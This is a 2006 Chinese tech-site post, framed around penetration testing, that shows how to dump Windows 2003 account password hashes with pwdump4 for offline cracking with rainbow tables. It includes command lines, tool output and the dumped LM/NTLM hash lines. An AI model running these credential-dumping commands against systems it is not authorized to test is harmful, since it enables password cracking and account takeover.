繁体中文
设为首页
加入收藏
当前位置:技术首页 >> 安全 >> 黑客攻防 >> Dump Hash From Windows 2003

Dump Hash From Windows 2003

2006-12-18 20:55:09  作者:unknown   来源:  浏览次数:46  文字大小:【】【】【

闲着无聊,看看众人的blog,忽发现包子同志Blog上一则日志:

  获取windows密码hash的两个方式
post by baozi @ 28 九月, 2005 09:47
在给客户做渗透测试的时候,遇到一个win2k3机器,pwdump4读不出密码bash,lc5装上去一读的话LC5就挂掉,突然想到saminside这个东西,似乎记得他有两个读本地密码散列的方式的,一个是一般的通过LSASS读,还有一个就是通过shedule服务来读,还没去搜索后者什么原理,拿上去一试果然行,另存为pwdump文件回来用ranbowcrack跑,哈哈

  国内似乎还没有利用shedule服务读密码的cmd程序吧,哪个大虾弄一个就好了,毕竟saminside图形的不方便。

  其实以前我也遇到过读不出来密码hash的 w2k3 的机器,只不过你参数用错了 hieei

  pwdump4 ip /o:fuckbaozi /u:administrator

  用这种格式一般来说可以dump出hash来 ip 换成 127.0.0.1 :D

  如果你用 /l 参数, 大部分是dump不出来的,即使dump出来,hash也是不全的.


C:\>pwdump4 127.0.0.1 /o:fuckbaozi /u:administrator
PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
by bingle@email.com.cn
This program is free software based on pwpump3 by Phil Staubs
under the GNU General Public License Version 2.
Please enter the password >*******
local path of \\127.0.0.1\ADMIN$ is: C:\WINDOWS
connect to 127.0.0.1 for result, plz wait...
SRV>Version: OS Ver 5.2, Service Pack 1, ServerTerminal
LSA>Samr Enumerate 4 Users In Domain DREAM.
All Completed.
C:\>type fuckbaozi
Administrator:500:A02F5A52E33540C0AAD3B435B514042E:00F0E9AB3FE77043C228DDB70E5C4
1A6:::
Guest:501:AAD3B445B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
kaka:1004:9FFBED36199C0D0723WD3B83FA6627C7:E4CCAB020C323DC2411876AE032CD5FF:::
SUPPORT_388945a0:1001:AAD3B435B51404EEAAD3B435B51404EE:3279F1AC07C5E7C1977524375
31BB8B3:::
C:\>pwdump4 /l /o:fuckbaozi /u:administrator
PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
by bingle@email.com.cn
This program is free software based on pwpump3 by Phil Staubs
under the GNU General Public License Version 2.
SRV>Version: OS Ver 5.2, Service Pack 1, ServerTerminal
C:\>type fuckbaozi
Administrator:500:A02F5322E10540A0AA33B435B51404EE:00F0E9433FE62378C228D4370E5C4
1A6:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
C:\>

  如此而已,用pwdump4 ip /o:file /u:user的方式,我还没有发现有不能dump出密码hash的2003系统.

责任编辑:itzero

本文引用地址: http://tech.itzero.com/2006/1218/5788.html 请粘贴到你的QQ/MSN上推荐给你的好友

相关文章
巧妙配合asp木马取得管理权限
骗黑客 伪装Linux设置假象加固系统安全
经典推荐:由简到繁系统安全指南(四)
铸造 Outlook Express 的金刚不坏之身
让你瞧瞧 黑客眼中的防火墙与路由器
用 Pam_Abl 来保护 SSH 不被强行攻击
关于Linux网络安全的内在限制
系统安全之谈谈Linux和UNIX下的病毒
教你配置Linux操作系统安全管理服务
Linux安全基础
Linux安全:步步设防(2)
 

最新文章

更多

· 巧妙配合asp木马取得管理...
· Windows系统用户摆脱黑客...
· 存在于网页中的5种隐形危...
· 黑客教你穿透ADSL路由入...
· 红黑过招 WinRAR破解磁盘...
· 黑客攻击较去年下半年增48%
· 著名黑客凯文·米特尼克...
· 黑客用google查找漏洞网...
· 巧妙的化解分布式拒绝服...
· 黑客破解口令常用的三种方法

热点文章

更多

· 巧妙配合asp木马取得管理...

其它推荐